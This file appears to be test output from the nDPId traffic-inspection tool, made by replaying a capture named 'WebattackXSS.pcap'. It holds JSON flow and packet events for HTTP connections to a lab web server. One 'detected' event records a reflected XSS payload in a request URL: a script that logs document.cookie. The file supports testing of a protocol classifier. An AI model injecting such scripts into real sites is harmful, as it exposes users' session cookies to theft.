-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YKVAAD4GZSusEAABwKgKMtP8AFCcucZwAAAAAKACchB\/fgAAAgQFtAQCCAoBOabVAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0\/zGVu0LnLnGcaAScSBQzAAAAgQFtAQCCAoD43hLATmm1QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":3,"flow_last_seen":1499347163178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347163178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YKZAAD4GZTKsEAABwKgKMtP8AFCcucZxxlbtDIAQAOXv0wAAAQEICgE5ptUD43hL"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347164459,"flow_last_seen":1499347164459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347164459,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1499347164459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yU1AAD4G\/IKsEAABwKgKMtQKAFBoaGFbAAAAAKACchAXlgAAAgQFtAQCCAoBOagWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1499347164459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ArCPOEyaGhhXKAScSD3lQAAAgQFtAQCCAoD43mMATmoFgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1499347164460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347164460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yU5AAD4G\/ImsEAABwKgKMtQKAFBoaGFcwjzhM4AQAOWWnQAAAQEICgE5qBYD43mM"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347165741,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347165741,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vRVAAD4GCLusEAABwKgKMtQYAFCo9hRDAAAAAKACchAi0gAAAgQFtAQCCAoBOalWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1BjYjd6VqPYURKAScSDt3QAAAgQFtAQCCAoD43rMATmpVgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1499347165742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347165742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vRZAAD4GCMKsEAABwKgKMtQYAFCo9hRE2I3eloAQAOWM5QAAAQEICgE5qVYD43rM"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347168302,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347168302,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pdZAAD4GH\/qsEAABwKgKMtQyAFAP+Q4AAAAAAKACchC\/eAAAAgQFtAQCCAoBOavWAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1DJusJVZD\/kOAaAScSA7HQAAAgQFtAQCCAoD431NATmr1gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1499347168303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347168303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pddAAD4GIAGsEAABwKgKMtQyAFAP+Q4BbrCVWoAQAOXaIwAAAQEICgE5q9cD431N"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347169573,"flow_last_seen":1499347169573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347169573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1499347169573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83TtAAD4G6JSsEAABwKgKMtRAAFDvZ3AvAAAAAKACchB8jgAAAgQFtAQCCAoBOa0UAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1499347169574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1EA8SVzP72dwMKAScSBh5gAAAgQFtAQCCAoD436LATmtFAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1499347169574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347169574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TxAAD4G6JusEAABwKgKMtRAAFDvZ3AwPElc0IAQAOUA7gAAAQEICgE5rRQD436L"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347172098,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347172098,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dk5AAD4GT4KsEAABwKgKMtRaAFDNItnFAAAAAKACchAyrAAAAgQFtAQCCAoBOa+LAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1FoQ75vBzSLZxqAScSAB9QAAAgQFtAQCCAoD44ECATmviwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1499347172099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347172099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dk9AAD4GT4msEAABwKgKMtRaAFDNItnGEO+bwoAQAOWg\/AAAAQEICgE5r4sD44EC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347173373,"flow_last_seen":1499347173373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347173373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1499347173373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XK1AAD4GaSOsEAABwKgKMtRoAFDpcOxnAAAAAKACchACbwAAAgQFtAQCCAoBObDKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1499347173373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1GhwCsiK6XDsaKAScSBElAAAAgQFtAQCCAoD44JBATmwygEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1499347173374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347173374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XK5AAD4GaSqsEAABwKgKMtRoAFDpcOxocArIi4AQAOXjmwAAAQEICgE5sMoD44JB"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347174667,"flow_last_seen":1499347174667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347174667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1499347174667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LxxAAD4GlrSsEAABwKgKMtR2AFATHZ0RAAAAAKACchAmyAAAAgQFtAQCCAoBObINAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1499347174667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1HZkheFBEx2dEqAScSBaeAAAAgQFtAQCCAoD44OEATmyDQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1499347174668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347174668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Lx1AAD4GlrusEAABwKgKMtR2AFATHZ0SZIXhQoAQAOX5fgAAAQEICgE5sg4D44OE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347177248,"flow_last_seen":1499347177248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347177248,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1499347177248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XzZAAD4GZpqsEAABwKgKMtSQAFC5seulAAAAAKACchAu\/wAAAgQFtAQCCAoBObSTAAAAAAEDAwc="} 